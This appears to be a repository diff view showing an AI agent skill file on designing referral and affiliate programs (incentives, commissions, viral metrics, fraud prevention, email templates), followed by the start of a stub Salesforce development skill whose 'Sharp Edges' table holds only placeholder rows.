description: "When the user wants to create, optimize, or analyze a referral program, affiliate program, or word-of-mouth strategy. Also use when the user mentions 'referral,' 'affiliate,' 'ambassador,' 'word of mouth,' 'viral loop,' 'refer a friend,' or 'partner program.' This skill covers program design, incentive structure, and growth optimization."
---
# Referral & Affiliate Programs
You are an expert in viral growth and referral marketing with access to referral program data and third-party tools. Your goal is to help design and optimize programs that turn customers into growth engines.
## Before Starting
Gather this context (ask if not provided):
### 1. Program Type
- Are you building a customer referral program, affiliate program, or both?
- Is this B2B or B2C?
- What's the average customer value (LTV)?
- What's your current CAC from other channels?
### 2. Current State
- Do you have an existing referral/affiliate program?
- What's your current referral rate (% of customers who refer)?
- What incentives have you tried?
- Do you have customer NPS or satisfaction data?
### 3. Product Fit
- Is your product shareable? (Does using it involve others?)
- Does your product have network effects?
- Do customers naturally talk about your product?
- What triggers word-of-mouth currently?
### 4. Resources
- What tools/platforms do you use or consider?
- What's your budget for referral incentives?
- Do you have engineering resources for custom implementation?
---
## Referral vs. Affiliate: When to Use Each
### Customer Referral Programs
**Best for:**
- Existing customers recommending to their network
- Products with natural word-of-mouth
- Building authentic social proof
- Lower-ticket or self-serve products
**Characteristics:**
- Referrer is an existing customer
- Motivation: Rewards + helping friends
- Typically one-time or limited rewards
- Tracked via unique links or codes
- Higher trust, lower volume
### Affiliate Programs
**Best for:**
- Reaching audiences you don't have access to
- Content creators, influencers, bloggers
- Products with clear value proposition
- Higher-ticket products that justify commissions
**Characteristics:**
- Affiliates may not be customers
- Motivation: Revenue/commission
- Ongoing commission relationship
- Requires more management
- Higher volume, variable trust
### Hybrid Approach
Many successful programs combine both:
- Referral program for customers (simple, small rewards)
- Affiliate program for partners (larger commissions, more structure)
---
## Referral Program Design
### The Referral Loop
```
┌─────────────────────────────────────────────────────┐
│ │
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
│ │ Trigger │───▶│ Share │───▶│ Convert │ │
│ │ Moment │ │ Action │ │ Referred │ │
│ └──────────┘ └──────────┘ └──────────┘ │
│ ▲ │ │
│ │ │ │
│ └───────────────────────────────┘ │
│ Reward │
└─────────────────────────────────────────────────────┘
```
### Step 1: Identify Trigger Moments
When are customers most likely to refer?
**High-intent moments:**
- Right after first "aha" moment
- After achieving a milestone
- After receiving exceptional support
- After renewing or upgrading
- When they tell you they love the product
**Natural sharing moments:**
- When the product involves collaboration
- When they're asked "what tool do you use?"
- When they share results publicly
- When they complete something shareable
### Step 2: Design the Share Mechanism
**Methods ranked by effectiveness:**
1. **In-product sharing** — Highest conversion, feels native
2. **Personalized link** — Easy to track, works everywhere
3. **Email invitation** — Direct, personal, higher intent
4. **Social sharing** — Broadest reach, lowest conversion
5. **Referral code** — Memorable, works offline
**Best practice:** Offer multiple sharing options, lead with the highest-converting method.
### Step 3: Choose Incentive Structure
**Single-sided rewards** (referrer only):
- Simpler to explain
- Works for high-value products
- Risk: Referred may feel no urgency
**Double-sided rewards** (both parties):
- Higher conversion rates
- Creates win-win framing
- Standard for most programs
**Tiered rewards:**
- Increases engagement over time
- Gamifies the referral process
- More complex to communicate
### Incentive Types
| Type | Pros | Cons | Best For |
|------|------|------|----------|
| Cash/credit | Universally valued | Feels transactional | Marketplaces, fintech |
| Product credit | Drives usage | Only valuable if they'll use it | SaaS, subscriptions |
| Free months | Clear value | May attract freebie-seekers | Subscription products |
| Feature unlock | Low cost to you | Only works for gated features | Freemium products |
| Swag/gifts | Memorable, shareable | Logistics complexity | Brand-focused companies |
| Charity donation | Feel-good | Lower personal motivation | Mission-driven brands |
### Incentive Sizing Framework
**Calculate your maximum incentive:**
```
Max Referral Reward = (Customer LTV × Gross Margin) - Target CAC
```
**Example:**
- LTV: $1,200
- Gross margin: 70%
- Target CAC: $200
- Max reward: ($1,200 × 0.70) - $200 = $640
**Typical referral rewards:**
- B2C: $10-50 or 10-25% of first purchase
- B2B SaaS: $50-500 or 1-3 months free
- Enterprise: Higher, often custom
---
## Referral Program Examples
### Dropbox (Classic)
**Program:** Give 500MB storage, get 500MB storage
**Why it worked:**
- Reward directly tied to product value
- Low friction (just an email)
- Both parties benefit equally
- Gamified with progress tracking
### Uber/Lyft
**Program:** Give $10 ride credit, get $10 when they ride
**Why it worked:**
- Immediate, clear value
- Double-sided incentive
- Easy to share (code/link)
- Triggered at natural moments
### Morning Brew
**Program:** Tiered rewards for subscriber referrals
- 3 referrals: Newsletter stickers
- 5 referrals: T-shirt
- 10 referrals: Mug
- 25 referrals: Hoodie
**Why it worked:**
- Gamification drives ongoing engagement
- Physical rewards are shareable (more referrals)
- Low cost relative to subscriber value
- Built status/identity
### Notion
**Program:** $10 credit per referral (education)
**Why it worked:**
- Targeted high-sharing audience (students)
- Product naturally spreads in teams
- Credit keeps users engaged
---
## Affiliate Program Design
### Commission Structures
**Percentage of sale:**
- Standard: 10-30% of first sale or first year
- Works for: E-commerce, SaaS with clear pricing
- Example: "Earn 25% of every sale you refer"
**Flat fee per action:**
- Standard: $5-500 depending on value
- Works for: Lead gen, trials, freemium
- Example: "$50 for every qualified demo"
**Recurring commission:**
- Standard: 10-25% of recurring revenue
- Works for: Subscription products
- Example: "20% of subscription for 12 months"
**Tiered commission:**
- Works for: Motivating high performers
- Example: "20% for 1-10 sales, 25% for 11-25, 30% for 26+"
### Cookie Duration
How long after click does affiliate get credit?
| Duration | Use Case |
|----------|----------|
| 24 hours | High-volume, low-consideration purchases |
| 7-14 days | Standard e-commerce |
| 30 days | Standard SaaS/B2B |
| 60-90 days | Long sales cycles, enterprise |
| Lifetime | Premium affiliate relationships |
### Affiliate Recruitment
**Where to find affiliates:**
- Existing customers who create content
- Industry bloggers and reviewers
- YouTubers in your niche
- Newsletter writers
- Complementary tool companies
- Consultants and agencies
**Outreach template:**
```
Subject: Partnership opportunity — [Your Product]
Hi [Name],
I've been following your content on [topic] — particularly [specific piece] — and think there could be a great fit for a partnership.
[Your Product] helps [audience] [achieve outcome], and I think your audience would find it valuable.
We offer [commission structure] for partners, plus [additional benefits: early access, co-marketing, etc.].
Would you be open to learning more?
[Your name]
```
### Affiliate Enablement
Provide affiliates with:
- [ ] Unique tracking links/codes
- [ ] Product overview and key benefits
- [ ] Target audience description
- [ ] Comparison to competitors
- [ ] Creative assets (logos, banners, images)
- [ ] Sample copy and talking points
- [ ] Case studies and testimonials
- [ ] Demo access or free account
- [ ] FAQ and objection handling
- [ ] Payment terms and schedule
---
## Viral Coefficient & Modeling
### Key Metrics
**Viral coefficient (K-factor):**
```
K = Invitations × Conversion Rate
K > 1 = Viral growth (each user brings more than 1 new user)
K < 1 = Amplified growth (referrals supplement other acquisition)
```
**Example:**
- Average customer sends 3 invitations
- 15% of invitations convert
- K = 3 × 0.15 = 0.45
**Referral rate:**
```
Referral Rate = (Customers who refer) / (Total customers)
```
Benchmarks:
- Good: 10-25% of customers refer
- Great: 25-50%
- Exceptional: 50%+
**Referrals per referrer:**
```
How many successful referrals does each referring customer generate?
```
Benchmarks:
- Average: 1-2 referrals per referrer
- Good: 2-5
- Exceptional: 5+
### Calculating Referral Program ROI
```
Referral Program ROI = (Revenue from referred customers - Program costs) / Program costs
Program costs = Rewards paid + Tool costs + Management time
```
**Track separately:**
- Cost per referred customer (CAC via referral)
- LTV of referred customers (often higher than average)
- Payback period for referral rewards
---
## Program Optimization
### Improving Referral Rate
**If few customers are referring:**
- Ask at better moments (after wins, not randomly)
- Simplify the sharing process
- Test different incentive types
- Make the referral prominent in product
- Remind via email campaigns
- Reduce friction in the flow
**If referrals aren't converting:**
- Improve the landing experience for referred users
- Strengthen the incentive for new users
- Test different messaging on referral pages
- Ensure the referrer's endorsement is visible
- Shorten the path to value
### A/B Tests to Run
**Incentive tests:**
- Reward amount (10% higher, 20% higher)
- Reward type (credit vs. cash vs. free months)
- Single vs. double-sided
- Immediate vs. delayed reward
**Messaging tests:**
- How you describe the program
- CTA copy on share buttons
- Email subject lines for referral invites
- Landing page copy for referred users
**Placement tests:**
- Where the referral prompt appears
- When it appears (trigger timing)
- How prominent it is
- In-app vs. email prompts
### Common Problems & Fixes
| Problem | Likely Cause | Fix |
|---------|--------------|-----|
| Low awareness | Program not visible | Add prominent in-app prompts |
| Low share rate | Too much friction | Simplify to one click |
| Low conversion | Weak landing page | Optimize referred user experience |
| Fraud/abuse | Gaming the system | Add verification, limits |
| One-time referrers | No ongoing motivation | Add tiered/gamified rewards |
---
## Fraud Prevention
### Common Referral Fraud
- Self-referrals (creating fake accounts)
- Referral rings (groups referring each other)
- Coupon sites posting referral codes
- Fake email addresses
- VPN/device spoofing
### Prevention Measures
**Technical:**
- Email verification required
- Device fingerprinting
- IP address monitoring
- Delayed reward payout (after activation)
- Minimum activity threshold
**Policy:**
- Clear terms of service
- Maximum referrals per period
- Reward clawback for refunds/chargebacks
- Manual review for suspicious patterns
**Structural:**
- Require referred user to take meaningful action
- Cap lifetime rewards
- Pay rewards in product credit (less attractive to fraudsters)
---
## Tools & Platforms
### Referral Program Tools
**Full-featured platforms:**
- ReferralCandy — E-commerce focused
- Ambassador — Enterprise referral programs
- Friendbuy — E-commerce and subscription
- GrowSurf — SaaS and tech companies
- Viral Loops — Template-based campaigns
**Built-in options:**
- Stripe (basic referral tracking)
- HubSpot (CRM-integrated)
- Segment (tracking and analytics)
### Affiliate Program Tools
**Affiliate networks:**
- ShareASale — Large merchant network
- Impact — Enterprise partnerships
- PartnerStack — SaaS focused
- Tapfiliate — Simple SaaS affiliate tracking
- FirstPromoter — SaaS affiliate management
**Self-hosted:**
- Rewardful — Stripe-integrated affiliates
- Refersion — E-commerce affiliates
### Choosing a Tool
Consider:
- Integration with your payment system
- Fraud detection capabilities
- Payout management
- Reporting and analytics
- Customization options
- Price vs. program scale
---
## Email Sequences for Referral Programs
### Referral Program Launch
**Email 1: Announcement**
```
Subject: You can now earn [reward] for sharing [Product]
Body:
We just launched our referral program!
Share [Product] with friends and earn [reward] for each person who signs up. They get [their reward] too.
[Unique referral link]
Here's how it works:
1. Share your link
2. Friend signs up
3. You both get [reward]
[CTA: Share now]
```
### Referral Nurture Sequence
**After signup (if they haven't referred):**
- Day 7: Remind about referral program
- Day 30: "Know anyone who'd benefit?"
- Day 60: Success story + referral prompt
- After milestone: "You just [achievement] — know others who'd want this?"
### Re-engagement for Past Referrers
```
Subject: Your friends are loving [Product]
Body:
Remember when you referred [Name]? They've [achievement/milestone].
Know anyone else who'd benefit? You'll earn [reward] for each friend who joins.
[Referral link]
```
---
## Measuring Success
### Dashboard Metrics
**Program health:**
- Active referrers (referred someone in last 30 days)
- Total referrals (invites sent)
- Referral conversion rate
- Rewards earned/paid
**Business impact:**
- % of new customers from referrals
- CAC via referral vs. other channels
- LTV of referred customers
- Referral program ROI
### Cohort Analysis
Track referred customers separately:
- Do they convert faster?
- Do they have higher LTV?
- Do they refer others at higher rates?
- Do they churn less?
Typical findings:
- Referred customers have 16-25% higher LTV
- Referred customers have 18-37% lower churn
- Referred customers refer others at 2-3x rate
---
## Launch Checklist
### Before Launch
- [ ] Define program goals and success metrics
- [ ] Design incentive structure
- [ ] Build or configure referral tool
- [ ] Create referral landing page
- [ ] Design email templates
- [ ] Set up tracking and attribution
- [ ] Define fraud prevention rules
- [ ] Create terms and conditions
- [ ] Test complete referral flow
- [ ] Plan launch announcement
### Launch
- [ ] Announce to existing customers (email)
- [ ] Add in-app referral prompts
- [ ] Update website with program details
- [ ] Brief support team on program
- [ ] Monitor for fraud/issues
- [ ] Track initial metrics
### Post-Launch (First 30 Days)
- [ ] Review conversion funnel
- [ ] Identify top referrers
- [ ] Gather feedback on program
- [ ] Fix any friction points
- [ ] Plan first optimizations
- [ ] Send reminder emails to non-referrers
---
## Questions to Ask
If you need more context:
1. What type of program are you building (referral, affiliate, or both)?
2. What's your customer LTV and current CAC?
3. Do you have an existing program, or starting from scratch?
4. What tools/platforms are you using or considering?
5. What's your budget for rewards/commissions?
6. Is your product naturally shareable (involves others, visible results)?
---
## Related Skills
- **launch-strategy**: For launching referral program effectively
- **email-sequence**: For referral nurture campaigns
- **marketing-psychology**: For understanding referral motivation
- **analytics-tracking**: For tracking referral attribution
- **pricing-strategy**: For structuring rewards relative to LTV

51
skills/salesforce-development/SKILL.md Normal file
View File

@@ -0,0 +1,51 @@
---
name: salesforce-development
description: "Expert patterns for Salesforce platform development including Lightning Web Components (LWC), Apex triggers and classes, REST/Bulk APIs, Connected Apps, and Salesforce DX with scratch orgs and 2nd generation packages (2GP). Use when: salesforce, sfdc, apex, lwc, lightning web components."
source: vibeship-spawner-skills (Apache 2.0)
---
# Salesforce Development
## Patterns
### Lightning Web Component with Wire Service
Use @wire decorator for reactive data binding with Lightning Data Service
or Apex methods. @wire fits LWC's reactive architecture and enables
Salesforce performance optimizations.
### Bulkified Apex Trigger with Handler Pattern
Apex triggers must be bulkified to handle 200+ records per transaction.
Use handler pattern for separation of concerns, testability, and
recursion prevention.
### Queueable Apex for Async Processing
Use Queueable Apex for async processing with support for non-primitive
types, monitoring via AsyncApexJob, and job chaining. Limit: 50 jobs
per transaction, 1 child job when chaining.
## Anti-Patterns
### ❌ SOQL Inside Loops
### ❌ DML Inside Loops
### ❌ Hardcoding IDs
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | high | See docs |
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | critical | See docs |

Some files were not shown because too many files have changed in this diff Show More